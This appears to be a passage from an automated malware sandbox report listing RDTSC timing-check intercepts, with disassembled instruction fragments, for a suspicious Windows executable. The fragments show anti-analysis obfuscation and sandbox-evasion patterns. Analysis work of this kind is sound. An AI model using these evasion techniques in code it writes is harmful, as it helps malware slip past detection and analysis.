Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9E73BB second address: 9E73C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9E73C1 second address: 9E744C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F270C8198CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007F270C8198C8h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 sub dword ptr [ebp+122D20F1h], ebx 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push esi 0x0000002f call 00007F270C8198C8h 0x00000034 pop esi 0x00000035 mov dword ptr [esp+04h], esi 0x00000039 add dword ptr [esp+04h], 00000014h 0x00000041 inc esi 0x00000042 push esi 0x00000043 ret 0x00000044 pop esi 0x00000045 ret 0x00000046 movsx ebx, bx 0x00000049 pushad 0x0000004a mov dword ptr [ebp+12454AD7h], ebx 0x00000050 mov dh, 81h 0x00000052 popad 0x00000053 push 00000000h 0x00000055 push eax 0x00000056 call 00007F270C8198D3h 0x0000005b xor dword ptr [ebp+122D2153h], ebx 0x00000061 pop ebx 0x00000062 pop ebx 0x00000063 xchg eax, esi 0x00000064 push eax 0x00000065 push edx 0x00000066 jo 00007F270C8198C8h 0x0000006c pushad 0x0000006d popad 0x0000006e rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9E744C second address: 9E747C instructions: 0x00000000 rdtsc 0x00000002 jo 00007F270C81A20Ch 0x00000008 jo 00007F270C81A206h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jmp 00007F270C81A219h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9E662B second address: 9E668E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F270C8198C8h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F270C8198D8h 0x00000012 nop 0x00000013 mov bl, dh 0x00000015 push dword ptr fs:[00000000h] 0x0000001c mov edi, dword ptr [ebp+12454B02h] 0x00000022 mov dword ptr fs:[00000000h], esp 0x00000029 jl 00007F270C8198D3h 0x0000002f pushad 0x00000030 sub bx, 6032h 0x00000035 mov ecx, dword ptr [ebp+122D29ADh] 0x0000003b popad 0x0000003c mov eax, dword ptr [ebp+122D0B39h] 0x00000042 or dword ptr [ebp+122D1D51h], eax 0x00000048 push FFFFFFFFh 0x0000004a cmc 0x0000004b push eax 0x0000004c push ecx 0x0000004d pushad 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9E83CE second address: 9E83D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9E75DF second address: 9E7675 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 mov di, dx 0x0000000c push dword ptr fs:[00000000h] 0x00000013 mov edi, 2D731250h 0x00000018 mov bx, si 0x0000001b mov dword ptr fs:[00000000h], esp 0x00000022 mov ebx, dword ptr [ebp+122D2B39h] 0x00000028 mov eax, dword ptr [ebp+122D0021h] 0x0000002e push 00000000h 0x00000030 push edi 0x00000031 call 00007F270C8198C8h 0x00000036 pop edi 0x00000037 mov dword ptr [esp+04h], edi 0x0000003b add dword ptr [esp+04h], 00000017h 0x00000043 inc edi 0x00000044 push edi 0x00000045 ret 0x00000046 pop edi 0x00000047 ret 0x00000048 mov ebx, 5468BCC7h 0x0000004d push FFFFFFFFh 0x0000004f jbe 00007F270C8198C6h 0x00000055 nop 0x00000056 pushad 0x00000057 jnl 00007F270C8198C8h 0x0000005d push edx 0x0000005e jmp 00007F270C8198D0h 0x00000063 pop edx 0x00000064 popad 0x00000065 push eax 0x00000066 pushad 0x00000067 pushad 0x00000068 jmp 00007F270C8198CDh 0x0000006d ja 00007F270C8198C6h 0x00000073 popad 0x00000074 push eax 0x00000075 push edx 0x00000076 jnp 00007F270C8198C6h 0x0000007c rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9E946C second address: 9E9470 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9EA3DF second address: 9EA3E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9EA3E5 second address: 9EA3FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F270C81A211h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9EB3E7 second address: 9EB3F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F270C8198C6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9EB3F2 second address: 9EB3F7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9EB3F7 second address: 9EB46D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jne 00007F270C8198CCh 0x0000000e nop 0x0000000f mov bl, C3h 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007F270C8198C8h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 00000014h 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d jno 00007F270C8198CBh 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push ebx 0x00000038 call 00007F270C8198C8h 0x0000003d pop ebx 0x0000003e mov dword ptr [esp+04h], ebx 0x00000042 add dword ptr [esp+04h], 00000019h 0x0000004a inc ebx 0x0000004b push ebx 0x0000004c ret 0x0000004d pop ebx 0x0000004e ret 0x0000004f push edi 0x00000050 add dword ptr [ebp+122D1AACh], eax 0x00000056 pop ebx 0x00000057 xchg eax, esi 0x00000058 jo 00007F270C8198D4h 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 pop eax 0x00000062 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9ED2A4 second address: 9ED2AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9ED2AB second address: 9ED329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007F270C8198D0h 0x0000000f push eax 0x00000010 pop eax 0x00000011 popad 0x00000012 jmp 00007F270C8198D5h 0x00000017 popad 0x00000018 nop 0x00000019 push 00000000h 0x0000001b push edx 0x0000001c call 00007F270C8198C8h 0x00000021 pop edx 0x00000022 mov dword ptr [esp+04h], edx 0x00000026 add dword ptr [esp+04h], 00000015h 0x0000002e inc edx 0x0000002f push edx 0x00000030 ret 0x00000031 pop edx 0x00000032 ret 0x00000033 movzx ebx, ax 0x00000036 push 00000000h 0x00000038 mov bx, ax 0x0000003b push 00000000h 0x0000003d or edi, dword ptr [ebp+122D22A2h] 0x00000043 xchg eax, esi 0x00000044 js 00007F270C8198CAh 0x0000004a push esi 0x0000004b pushad 0x0000004c popad 0x0000004d pop esi 0x0000004e push eax 0x0000004f push eax 0x00000050 pushad 0x00000051 jmp 00007F270C8198CDh 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9EE295 second address: 9EE299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9EE299 second address: 9EE29D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9EE29D second address: 9EE340 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 jnl 00007F270C81A212h 0x0000000e nop 0x0000000f mov edi, ebx 0x00000011 adc edi, 628C6257h 0x00000017 push 00000000h 0x00000019 jmp 00007F270C81A210h 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push esi 0x00000023 call 00007F270C81A208h 0x00000028 pop esi 0x00000029 mov dword ptr [esp+04h], esi 0x0000002d add dword ptr [esp+04h], 00000015h 0x00000035 inc esi 0x00000036 push esi 0x00000037 ret 0x00000038 pop esi 0x00000039 ret 0x0000003a or dword ptr [ebp+122D2120h], ecx 0x00000040 call 00007F270C81A213h 0x00000045 pushad 0x00000046 mov dword ptr [ebp+1245B146h], edi 0x0000004c xor dword ptr [ebp+12454AEAh], esi 0x00000052 popad 0x00000053 pop edi 0x00000054 xchg eax, esi 0x00000055 jnp 00007F270C81A21Fh 0x0000005b push eax 0x0000005c push eax 0x0000005d push edx 0x0000005e push eax 0x0000005f push edx 0x00000060 push edx 0x00000061 pop edx 0x00000062 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9EA61D second address: 9EA622 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9EE340 second address: 9EE344 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9EC500 second address: 9EC505 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9EE344 second address: 9EE34A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9EE34A second address: 9EE354 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F270C8198CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9ED536 second address: 9ED53B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9EE44C second address: 9EE45A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007F270C8198C6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9F2330 second address: 9F233C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F270C81A20Eh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 98634B second address: 98634F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 98634F second address: 986374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F270C81A206h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c je 00007F270C81A21Dh 0x00000012 jmp 00007F270C81A211h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 986374 second address: 986378 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 986378 second address: 98638D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F270C81A210h 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9F2B21 second address: 9F2B40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F270C8198D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9F2B40 second address: 9F2B55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007F270C81A20Ch 0x0000000f jl 00007F270C81A206h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9F2C1B second address: 9F2C32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F270C8198CAh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9F2C32 second address: 9F2C3C instructions: 0x00000000 rdtsc 0x00000002 je 00007F270C81A206h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9F2C3C second address: 9F2C41 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9FA9AD second address: 9FA9DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F270C81A206h 0x0000000a popad 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F270C81A20Bh 0x00000013 push esi 0x00000014 jmp 00007F270C81A213h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9FA9DC second address: 9FA9E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9FA9E1 second address: 9FA9FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F270C81A215h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9FA9FC second address: 9FAA00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9FAA00 second address: 9FAA06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9FAB4B second address: 9FAB56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F270C8198C6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9FADBE second address: 9FADD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F270C81A211h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9FF603 second address: 9FF619 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b jo 00007F270C8198C6h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9FF619 second address: 9FF61D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A020DA second address: A020FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F270C8198CEh 0x00000009 jne 00007F270C8198CEh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A020FA second address: A02106 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F270C81A206h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A03A41 second address: A03A45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A07E5A second address: A07E5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A07E5E second address: A07E6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F270C8198C8h 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A08388 second address: A08394 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A08394 second address: A083A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F270C8198C6h 0x0000000a jmp 00007F270C8198CAh 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A084EE second address: A084FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F270C81A20Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A0883F second address: A08851 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F270C8198CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A08851 second address: A08857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A0D3A1 second address: A0D3B2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F270C8198CBh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A0D3B2 second address: A0D3B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A0D3B8 second address: A0D3CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F270C8198CEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A0D3CA second address: A0D3EC instructions: 0x00000000 rdtsc 0x00000002 je 00007F270C81A206h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b je 00007F270C81A206h 0x00000011 push eax 0x00000012 pop eax 0x00000013 pop edi 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jp 00007F270C81A20Ah 0x0000001e rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A0D3EC second address: A0D3F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A0D52E second address: A0D532 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A0D532 second address: A0D542 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F270C8198C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A0D542 second address: A0D54E instructions: 0x00000000 rdtsc 0x00000002 jns 00007F270C81A206h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A0D68F second address: A0D696 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A0D696 second address: A0D69D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A0DA5A second address: A0DA5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A0DBC6 second address: A0DBCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A0DBCC second address: A0DBED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F270C8198D8h 0x0000000c jmp 00007F270C8198D0h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A0E057 second address: A0E07A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F270C81A218h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push ecx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A0E07A second address: A0E087 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A0E087 second address: A0E08D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A0E08D second address: A0E091 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9BCA22 second address: 9BCA28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9BCA28 second address: 9BCA32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9BCA32 second address: 9BCA48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F270C81A212h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 98B606 second address: 98B66F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F270C8198D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F270C8198CEh 0x0000000e jmp 00007F270C8198CEh 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F270C8198D4h 0x0000001b pushad 0x0000001c push edi 0x0000001d pop edi 0x0000001e jmp 00007F270C8198D5h 0x00000023 jl 00007F270C8198C6h 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 98B66F second address: 98B677 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 98B677 second address: 98B67B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 98B67B second address: 98B6AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F270C81A20Ch 0x0000000f jmp 00007F270C81A219h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A16641 second address: A16677 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 popad 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F270C8198D2h 0x00000010 jmp 00007F270C8198D9h 0x00000015 rdtsc
